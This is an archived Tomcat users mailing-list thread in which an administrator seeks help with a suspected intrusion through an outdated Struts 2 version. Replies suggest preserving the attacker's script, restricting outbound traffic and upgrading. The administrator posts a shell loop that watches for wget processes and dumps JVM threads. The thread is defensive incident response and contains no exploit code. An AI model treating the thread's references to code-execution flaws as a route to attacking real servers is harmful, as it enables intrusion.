You are viewing a plain text version of this content. The canonical link for it is here.
Posted to users@tomcat.apache.org by Cédric Couralet <ce...@gmail.com> on 2014/05/01 16:00:12 UTC
Re: Regarding i think an intrusion
2014-04-30 19:07 GMT+02:00 Christopher Schultz <chris@christopherschultz.net
>:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA256
>
> Leonardo,
>
> On 4/30/14, 12:48 PM, Leonardo Santagostini wrote:
> > Im uploading mi logfiles so it will be available when finished
> > uploading.
>
> Remember to get a thread dump while Runtime.exec() is running.
>
> You should copy the script /tmp/4.sh somewhere else so you have a copy
> in case the attacker tries to clean-up after themselves. That's
> certainly what's doing the evil work.
>
> You could probably set up iptables or something to restrict outgoing
> requests so that the attack can't progress across your network.
>
> > Regarding the configuration, its working in two other sites
> > without problem, and there is no problem putting L4 balancing with
> > haproxy.
> >
> > I have asked developers about that exploit, still without answer.
>
> You appear to be using struts2 2.1.8, which is in the range of
> versions vulnerable to this bug. There is a workaround that you can
> probably apply:
> http://struts.apache.org/release/2.3.x/docs/s2-021.html (see the last
> section on this page).
Of course, the vulnerability doesn't allow you to simply inject code
> or anything like that: you can certainly mess-around with code that is
> already available on the site, though.
>
>
I think the S2-021 can be used to inject code. There is a POC circulating
proving it.
That said, this struts version (2.1.8) is also vulnerable to
http://struts.apache.org/release/2.3.x/docs/s2-016.html which permits code
execution very easily.
> - -chris
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1
> Comment: GPGTools - http://gpgtools.org
> Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/
>
> iQIcBAEBCAAGBQJTYS3BAAoJEBzwKT+lPKRYqDsP/jmNjM+YwxySFGgPUuvcL2bN
> kkApblcr9ryGZQG6RGwUFr69FCJ8qFDQSZ0aXXxPCfTpM6ce1VqXPv+WcOwnueOF
> mrugSa2InF2IWPAP2lwhEGqyxRAYZGfxz0aA9sFb7sSw4IpDP7u6TJx9g3oYrLTt
> URIbzTfhY0aGgEkQlrWNgrAWFKsUQ0uOrg8+3IS52O/e1ZVdudTMQBh5/LLJ522p
> yr+TlMooKDY8OA1TYttE0zEe3/Z9dd2AZ4YHoqLy8Hwq0lufYSaFZ5TpHfiOgJ0I
> 0Q3dcXEmjMTrBkBm4JKBR9b6KZSvG/H42q0GsEFHZeGw+3VIqYFGVRR5iCRRvVgg
> cqVKgGevB+fefcbGX9IFgFnus8QMUYq4XOcsE1YJVflxVBEfgwsCDLZEJqpzbovV
> ZpNBimPoLc8I5ifo2o7GSkO1GNSjhD7Q9p5MnmNW7Qna9RJh67Lv2oft9yPqGvjZ
> F2dTgbKFqyr8GSy/X4Ji8FsoeK+YxF0zXXDkaXxJzu054LuhodLCHJu7WwnwGjjL
> 0VI/Xxfihzk9+u3HNuwK0HTEt40Tca+vEKDUlMa9fvHL3ZqM3upy50bGE0PCTrJO
> A1cI+e0lzKEEQ+maym65DmSYiVvUPnfv0AxA0iUfU/UbhV1yWEkD3TyF3dOZPZqH
> ob6Km1Clt4KNLKVyQjt+
> =8KFm
> -----END PGP SIGNATURE-----
>
> ---------------------------------------------------------------------
> To unsubscribe, e-mail: users-unsubscribe@tomcat.apache.org
> For additional commands, e-mail: users-help@tomcat.apache.org
>
>
Re: Regarding i think an intrusion
Posted by Leonardo Santagostini <ls...@gmail.com>.
Well well well. Thank you all so much !!!
Since Struts upgrade i got not intrussion on my servers =) =)
Thank you list for the support, for the time and for helpme with this issue.
Yours,
Leonardo
Saludos.-
Leonardo Santagostini
<http://ar.linkedin.com/in/santagostini>
2014-05-20 12:45 GMT-03:00 Leonardo Santagostini <ls...@gmail.com>:
> Hello all, again its me =)
>
> Just for you that today we deployed our apps using struts 2.3.16.2
>
> So since today i will monitor those server very closely =)
>
> Thanks all people. I will tell you how things go.
>
> Regards,
> Leonardo
>
> Saludos.-
> Leonardo Santagostini
>
> <http://ar.linkedin.com/in/santagostini>
>
>
>
>
>
> 2014-05-07 12:28 GMT-03:00 Leonardo Santagostini <ls...@gmail.com>
> :
>
> Hello all !
>>
>> Developers are still "estimating the effort" for upgrading struts.... i
>> will let you know how things are going.
>>
>> Thanks all for replying me.
>>
>> Regards,
>> Leonardo
>>
>> Saludos.-
>> Leonardo Santagostini
>>
>> <http://ar.linkedin.com/in/santagostini>
>>
>>
>>
>>
>>
>> 2014-05-05 15:39 GMT-03:00 Martin Gainty <mg...@hotmail.com>:
>>
>>> > Subject: Re: Regarding i think an intrusion
>>> > From: lsantagostini@gmail.com
>>> > To: users@tomcat.apache.org
>>> >
>>> > Hello Chris, but this logfile was only one day.
>>> MG>Ay Caramba!
>>> >
>>> > Maybe i had a concept mismatch trying to capture the exact moment when
>>> the
>>> > execution begins.
>>> >
>>> > My command was
>>> >
>>> > while [ true ]; do CUENTO=$(ps -fea | grep wget | grep -v grep | grep
>>> -v
>>> > "127.0.0.1" | wc -l); if [ $CUENTO -gt 0 ] ; then PIDJAVA=$(ps -fea |
>>> grep
>>> > java | grep -v grep | awk '{ print $2 }'); echo -e "Se encontro wget
>>> > corriendo, sacando dump de JVM..." ; kill -3 $PIDJAVA; fi; sleep 3;
>>> done
>>> >
>>> > Maybe too many dumps all togheter, now im trying to get a "live"
>>> capture
>>> > without luck =(
>>> >
>>> > If you know a better method, please letme know it.
>>> >
>>> > Thanks for your effort, knid regards,
>>> > Leonardo
>>> >
>>> > Saludos.-
>>> > Leonardo Santagostini
>>> MG>Tomcat APR no puede utilizar WebSockets con JDK 1.6 ...necesita
>>> utilizar JDK @ 1.7 (ahora)
>>> MG>esto
>>> "ContainerBackgroundProcessor[StandardEngine[Catalina]]" daemon prio=10
>>> tid=0x0000000052867800 nid=0x2550 waiting on condition [0x000000004105e000]
>>> java.lang.Thread.State: TIMED_WAITING (sleeping)
>>> at java.lang.Thread.sleep(Native Method)
>>> at
>>> org.apache.catalina.core.ContainerBase$ContainerBackgroundProcessor.run(ContainerBase.java:1508)
>>> at java.lang.Thread.run(Thread.java:662)
>>> MG>Estos registros informativos producen MUCHO ruido
>>> MG>log4j.properties
>>> MG>log4j.logger.org.quartz=OFF //(Callate Quartz)
>>>
>>> MG>eso
>>> "ajp-bio-8009-exec-37" daemon prio=10 tid=0x00002aaac07fd800 nid=0x2656
>>> runnable [0x0000000046f34000]
>>> java.lang.Thread.State: RUNNABLE
>>> at java.util.regex.Pattern$6.isSatisfiedBy(Pattern.java:4763)
>>> at java.util.regex.Pattern$CharProperty.match(Pattern.java:3345)
>>> at java.util.regex.Pattern$Curly.match0(Pattern.java:3770)
>>> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>>> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>>> at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
>>> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
>>> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
>>> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>>> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>>> at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
>>> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
>>> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
>>> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>>> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>>> at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
>>> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
>>> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
>>> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>>> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>>> at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
>>> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
>>> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
>>> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>>> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>>> at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
>>> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
>>> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
>>> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>>> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>>> at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
>>> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
>>> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
>>> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>>> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>>> at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
>>> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
>>> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
>>> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>>> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>>> at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
>>> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
>>> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
>>> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>>> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>>> at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
>>> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
>>> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
>>> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>>> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>>> at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
>>> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
>>> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
>>> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>>> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>>> at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
>>> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
>>> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
>>> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>>> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>>> at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
>>> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
>>> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
>>> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>>> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>>> at java.util.regex.Pattern$Loop.match(Pattern.java:4282)
>>> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
>>> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
>>> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>>> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>>> at java.util.regex.Pattern$Loop.matchInit(Pattern.java:4311)
>>> at java.util.regex.Pattern$Prolog.match(Pattern.java:4251)
>>> at java.util.regex.Pattern$Branch.match(Pattern.java:4114)
>>> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>>> at java.util.regex.Pattern$BmpCharProperty.match(Pattern.java:3366)
>>> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
>>> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>>> at java.util.regex.Pattern$SliceI.match(Pattern.java:3507)
>>> at java.util.regex.Pattern$Begin.match(Pattern.java:3120)
>>> MG>DEMASIADO!
>>> MG>necesita cambiar match-type desde regex at wildcard en Tuckey
>>> .\WEB-INF\urlrewrite.xml...por ejemplo
>>> <!-- regex no es necessario -->
>>> <!-- rule match-type="regex">
>>> <name>BasicRule</name>
>>> <from>basicfrom</from>
>>> <to>basicto</to>
>>> </rule -->
>>> <rule match-type="wildcard">
>>> <name>BasicRule</name>
>>> <from>basicfrom</from>
>>> <to>basicto</to>
>>> </rule>
>>> MG>puedes ver que nombre, desde y a son los mismos
>>>
>>> MG>Cada vez que veas 'Runnable' y 'locked' (por ejemplo)
>>> "http-bio-8080-exec-28" daemon prio=10 tid=0x0000000044c5f800 nid=0xe9d
>>> waiting on condition [0x000000004ad9b000]
>>> java.lang.Thread.State: RUNNABLE
>>> at java.util.Vector.addElement(Vector.java:572)
>>> - locked <0x00000006e031b010> (a org.apache.log4j.ProvisionNode)
>>> at org.apache.log4j.Hierarchy.updateParents(Hierarchy.java:509)
>>> at org.apache.log4j.Hierarchy.getLogger(Hierarchy.java:273)
>>> - locked <0x00000006e0303d80> (a java.util.Hashtable)
>>>
>>> MG>necessita mata el proceso o cambia proceso lento ...(log4j
>>> updateParents) por ejemplo en log4j
>>> package org.apache.log4j;
>>> public class Hierarchy implements org.apache.log4j.spi.LoggerFactory,
>>> org.apache.log4j.spi.RendererSupport{
>>> private org.apache.log4j.spi.LoggerFactory defaultFactory;
>>> private java.util.Vector listeners;
>>> // Hashtable ht;
>>> java.util.ConcurrentHashMap<String,ProvisionNode> ht=new
>>> java.util.ConcurrentHashMap<String,ProvisionNode>();
>>>
>>> //mucho mas tarde
>>> public Logger getLogger(String name, org.apache.log4j.spi.LoggerFactory
>>> factory) {
>>> {
>>> ....
>>> } else if (o instanceof org.apache.log4j.ProvisionNode) {
>>> //System.out.println("("+name+") ht.get(this) returned ProvisionNode");
>>> logger = factory.makeNewLoggerInstance(name);
>>> logger.setHierarchy(this);
>>> ht.put(key, logger);
>>> updateChildren((ProvisionNode) o, logger);
>>> updateParents(logger);
>>> return logger;
>>> }
>>>
>>>
>>> http://docs.oracle.com/javase/7/docs/api/java/util/concurrent/ConcurrentHashMap.html
>>> MG>Entiendes?
>>> MG>Martín
>>>
>>> >
>>> > <http://ar.linkedin.com/in/santagostini>
>>> >
>>> >
>>> >
>>> >
>>> >
>>> > 2014-05-05 13:06 GMT-03:00 Christopher Schultz <
>>> chris@christopherschultz.net
>>> > >:
>>> >
>>> > > -----BEGIN PGP SIGNED MESSAGE-----
>>> > > Hash: SHA256
>>> > >
>>> > > Leonardo,
>>> > >
>>> > > On 5/5/14, 11:12 AM, Leonardo Santagostini wrote:
>>> > > > Ok, again its uploaded.
>>> > > >
>>> > > > This is the link
>>> > > >
>>> > > >
>>> > >
>>> https://drive.google.com/file/d/0B5oeFmSS7h7EOFE5Nk9KMmd4RFE/edit?usp=sharing
>>> > >
>>> > > 1/2
>>> > > >
>>> > > GiB log file? Hrm.
>>> > >
>>> > > It doesn't even have any calls to Runtime.exec in it. If you have a
>>> > > snapshot of a thread dump (and only the thread dump, I don't need 3
>>> > > weeks of your logs) that you took while the "intrusion" was taking
>>> > > place, post that.
>>> > >
>>> > > If you don't, then I think you're out of luck.
>>> > >
>>> > > Sounds like a bad time to go on holiday.
>>> > >
>>> > > - -chris
>>> > > -----BEGIN PGP SIGNATURE-----
>>> > > Version: GnuPG v1
>>> > > Comment: GPGTools - http://gpgtools.org
>>> > > Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/
>>> > >
>>> > > iQIcBAEBCAAGBQJTZ7cEAAoJEBzwKT+lPKRYg0cP/1KH8lflN/Gdt8KJPJsOvmrs
>>> > > Jqok5NA6CsYZhI9AjxiCzK54O+HRrv8qpy9oyk1l4yCv7ims3Zd6PI6YmMmMjYbO
>>> > > TQiJ0ufWNI4mGj9WesHWPtFsSRsKfkhISXfKhdi3jO4p+uH03SkFivGMrKzRqkX/
>>> > > IKVRV6lh2we3RFY/D/Vb0ptC/lSoy04tSI1H9IYJARI0DDh2tbVtJI1GvTp+qFch
>>> > > mm4/FTEh6a8XrE09EUvfyeFZKx5anEw0ybo0tU3TQHY76yOKHdP+ySjYBVGbjOx3
>>> > > Ma38x1OqWBhwlfBlQbbHWl+QHbC7WhR4KHo+Aif+gQIF+DDgMURaRkJZepSzCUCt
>>> > > az6CKVllIErzN5eimwJxRYGFTDCn/3aRw/0Pvy7WIuReiqhaJh16PdUJCXAX8w/m
>>> > > Vxf+3rCziAgcTlVHJzDepQVnSOG5XYWpVNTdTwMwrKw1dWIQC9Iya8gK8R2Ynzpt
>>> > > kzeANOyhJE9fsmVpTxv5mx4CJuai/jF66BI92oBRnVOqr5sfAhzpstR59Njzw0H8
>>> > > tHPF/XfhII1AEeLJpCiFw7PgO/zLtu6R0Z6mXnuC3vNJ0HesWaumRhqzPy9of+m/
>>> > > 0FBZ5rMdPOrMY9vtnCUjTOzRWxlm0qQHI7g1UqmawtRZNuv47rkTPD92MubzAlSB
>>> > > EcwrNcX2iZ+JXXtSTnzH
>>> > > =nxGK
>>> > > -----END PGP SIGNATURE-----
>>> > >
>>> > > ---------------------------------------------------------------------
>>> > > To unsubscribe, e-mail: users-unsubscribe@tomcat.apache.org
>>> > > For additional commands, e-mail: users-help@tomcat.apache.org
>>> > >
>>> > >
>>>
>>>
>>
>>
>
Re: Regarding i think an intrusion
Posted by Leonardo Santagostini <ls...@gmail.com>.
Hello all, again its me =)
Just for you that today we deployed our apps using struts 2.3.16.2
So since today i will monitor those server very closely =)
Thanks all people. I will tell you how things go.
Regards,
Leonardo
Saludos.-
Leonardo Santagostini
<http://ar.linkedin.com/in/santagostini>
2014-05-07 12:28 GMT-03:00 Leonardo Santagostini <ls...@gmail.com>:
> Hello all !
>
> Developers are still "estimating the effort" for upgrading struts.... i
> will let you know how things are going.
>
> Thanks all for replying me.
>
> Regards,
> Leonardo
>
> Saludos.-
> Leonardo Santagostini
>
> <http://ar.linkedin.com/in/santagostini>
>
>
>
>
>
> 2014-05-05 15:39 GMT-03:00 Martin Gainty <mg...@hotmail.com>:
>
>> > Subject: Re: Regarding i think an intrusion
>> > From: lsantagostini@gmail.com
>> > To: users@tomcat.apache.org
>> >
>> > Hello Chris, but this logfile was only one day.
>> MG>Ay Caramba!
>> >
>> > Maybe i had a concept mismatch trying to capture the exact moment when
>> the
>> > execution begins.
>> >
>> > My command was
>> >
>> > while [ true ]; do CUENTO=$(ps -fea | grep wget | grep -v grep | grep -v
>> > "127.0.0.1" | wc -l); if [ $CUENTO -gt 0 ] ; then PIDJAVA=$(ps -fea |
>> grep
>> > java | grep -v grep | awk '{ print $2 }'); echo -e "Se encontro wget
>> > corriendo, sacando dump de JVM..." ; kill -3 $PIDJAVA; fi; sleep 3; done
>> >
>> > Maybe too many dumps all togheter, now im trying to get a "live" capture
>> > without luck =(
>> >
>> > If you know a better method, please letme know it.
>> >
>> > Thanks for your effort, knid regards,
>> > Leonardo
>> >
>> > Saludos.-
>> > Leonardo Santagostini
>> MG>Tomcat APR no puede utilizar WebSockets con JDK 1.6 ...necesita
>> utilizar JDK @ 1.7 (ahora)
>> MG>esto
>> "ContainerBackgroundProcessor[StandardEngine[Catalina]]" daemon prio=10
>> tid=0x0000000052867800 nid=0x2550 waiting on condition [0x000000004105e000]
>> java.lang.Thread.State: TIMED_WAITING (sleeping)
>> at java.lang.Thread.sleep(Native Method)
>> at
>> org.apache.catalina.core.ContainerBase$ContainerBackgroundProcessor.run(ContainerBase.java:1508)
>> at java.lang.Thread.run(Thread.java:662)
>> MG>Estos registros informativos producen MUCHO ruido
>> MG>log4j.properties
>> MG>log4j.logger.org.quartz=OFF //(Callate Quartz)
>>
>> MG>eso
>> "ajp-bio-8009-exec-37" daemon prio=10 tid=0x00002aaac07fd800 nid=0x2656
>> runnable [0x0000000046f34000]
>> java.lang.Thread.State: RUNNABLE
>> at java.util.regex.Pattern$6.isSatisfiedBy(Pattern.java:4763)
>> at java.util.regex.Pattern$CharProperty.match(Pattern.java:3345)
>> at java.util.regex.Pattern$Curly.match0(Pattern.java:3770)
>> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>> at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
>> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
>> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
>> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>> at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
>> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
>> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
>> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>> at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
>> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
>> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
>> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>> at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
>> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
>> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
>> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>> at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
>> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
>> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
>> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>> at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
>> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
>> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
>> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>> at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
>> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
>> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
>> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>> at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
>> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
>> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
>> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>> at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
>> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
>> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
>> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>> at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
>> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
>> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
>> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>> at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
>> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
>> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
>> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>> at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
>> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
>> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
>> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>> at java.util.regex.Pattern$Loop.match(Pattern.java:4282)
>> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
>> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
>> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>> at java.util.regex.Pattern$Loop.matchInit(Pattern.java:4311)
>> at java.util.regex.Pattern$Prolog.match(Pattern.java:4251)
>> at java.util.regex.Pattern$Branch.match(Pattern.java:4114)
>> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>> at java.util.regex.Pattern$BmpCharProperty.match(Pattern.java:3366)
>> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
>> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>> at java.util.regex.Pattern$SliceI.match(Pattern.java:3507)
>> at java.util.regex.Pattern$Begin.match(Pattern.java:3120)
>> MG>DEMASIADO!
>> MG>necesita cambiar match-type desde regex at wildcard en Tuckey
>> .\WEB-INF\urlrewrite.xml...por ejemplo
>> <!-- regex no es necessario -->
>> <!-- rule match-type="regex">
>> <name>BasicRule</name>
>> <from>basicfrom</from>
>> <to>basicto</to>
>> </rule -->
>> <rule match-type="wildcard">
>> <name>BasicRule</name>
>> <from>basicfrom</from>
>> <to>basicto</to>
>> </rule>
>> MG>puedes ver que nombre, desde y a son los mismos
>>
>> MG>Cada vez que veas 'Runnable' y 'locked' (por ejemplo)
>> "http-bio-8080-exec-28" daemon prio=10 tid=0x0000000044c5f800 nid=0xe9d
>> waiting on condition [0x000000004ad9b000]
>> java.lang.Thread.State: RUNNABLE
>> at java.util.Vector.addElement(Vector.java:572)
>> - locked <0x00000006e031b010> (a org.apache.log4j.ProvisionNode)
>> at org.apache.log4j.Hierarchy.updateParents(Hierarchy.java:509)
>> at org.apache.log4j.Hierarchy.getLogger(Hierarchy.java:273)
>> - locked <0x00000006e0303d80> (a java.util.Hashtable)
>>
>> MG>necessita mata el proceso o cambia proceso lento ...(log4j
>> updateParents) por ejemplo en log4j
>> package org.apache.log4j;
>> public class Hierarchy implements org.apache.log4j.spi.LoggerFactory,
>> org.apache.log4j.spi.RendererSupport{
>> private org.apache.log4j.spi.LoggerFactory defaultFactory;
>> private java.util.Vector listeners;
>> // Hashtable ht;
>> java.util.ConcurrentHashMap<String,ProvisionNode> ht=new
>> java.util.ConcurrentHashMap<String,ProvisionNode>();
>>
>> //mucho mas tarde
>> public Logger getLogger(String name, org.apache.log4j.spi.LoggerFactory
>> factory) {
>> {
>> ....
>> } else if (o instanceof org.apache.log4j.ProvisionNode) {
>> //System.out.println("("+name+") ht.get(this) returned ProvisionNode");
>> logger = factory.makeNewLoggerInstance(name);
>> logger.setHierarchy(this);
>> ht.put(key, logger);
>> updateChildren((ProvisionNode) o, logger);
>> updateParents(logger);
>> return logger;
>> }
>>
>>
>> http://docs.oracle.com/javase/7/docs/api/java/util/concurrent/ConcurrentHashMap.html
>> MG>Entiendes?
>> MG>Martín
>>
>> >
>> > <http://ar.linkedin.com/in/santagostini>
>> >
>> >
>> >
>> >
>> >
>> > 2014-05-05 13:06 GMT-03:00 Christopher Schultz <
>> chris@christopherschultz.net
>> > >:
>> >
>> > > -----BEGIN PGP SIGNED MESSAGE-----
>> > > Hash: SHA256
>> > >
>> > > Leonardo,
>> > >
>> > > On 5/5/14, 11:12 AM, Leonardo Santagostini wrote:
>> > > > Ok, again its uploaded.
>> > > >
>> > > > This is the link
>> > > >
>> > > >
>> > >
>> https://drive.google.com/file/d/0B5oeFmSS7h7EOFE5Nk9KMmd4RFE/edit?usp=sharing
>> > >
>> > > 1/2
>> > > >
>> > > GiB log file? Hrm.
>> > >
>> > > It doesn't even have any calls to Runtime.exec in it. If you have a
>> > > snapshot of a thread dump (and only the thread dump, I don't need 3
>> > > weeks of your logs) that you took while the "intrusion" was taking
>> > > place, post that.
>> > >
>> > > If you don't, then I think you're out of luck.
>> > >
>> > > Sounds like a bad time to go on holiday.
>> > >
>> > > - -chris
>> > > -----BEGIN PGP SIGNATURE-----
>> > > Version: GnuPG v1
>> > > Comment: GPGTools - http://gpgtools.org
>> > > Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/
>> > >
>> > > iQIcBAEBCAAGBQJTZ7cEAAoJEBzwKT+lPKRYg0cP/1KH8lflN/Gdt8KJPJsOvmrs
>> > > Jqok5NA6CsYZhI9AjxiCzK54O+HRrv8qpy9oyk1l4yCv7ims3Zd6PI6YmMmMjYbO
>> > > TQiJ0ufWNI4mGj9WesHWPtFsSRsKfkhISXfKhdi3jO4p+uH03SkFivGMrKzRqkX/
>> > > IKVRV6lh2we3RFY/D/Vb0ptC/lSoy04tSI1H9IYJARI0DDh2tbVtJI1GvTp+qFch
>> > > mm4/FTEh6a8XrE09EUvfyeFZKx5anEw0ybo0tU3TQHY76yOKHdP+ySjYBVGbjOx3
>> > > Ma38x1OqWBhwlfBlQbbHWl+QHbC7WhR4KHo+Aif+gQIF+DDgMURaRkJZepSzCUCt
>> > > az6CKVllIErzN5eimwJxRYGFTDCn/3aRw/0Pvy7WIuReiqhaJh16PdUJCXAX8w/m
>> > > Vxf+3rCziAgcTlVHJzDepQVnSOG5XYWpVNTdTwMwrKw1dWIQC9Iya8gK8R2Ynzpt
>> > > kzeANOyhJE9fsmVpTxv5mx4CJuai/jF66BI92oBRnVOqr5sfAhzpstR59Njzw0H8
>> > > tHPF/XfhII1AEeLJpCiFw7PgO/zLtu6R0Z6mXnuC3vNJ0HesWaumRhqzPy9of+m/
>> > > 0FBZ5rMdPOrMY9vtnCUjTOzRWxlm0qQHI7g1UqmawtRZNuv47rkTPD92MubzAlSB
>> > > EcwrNcX2iZ+JXXtSTnzH
>> > > =nxGK
>> > > -----END PGP SIGNATURE-----
>> > >
>> > > ---------------------------------------------------------------------
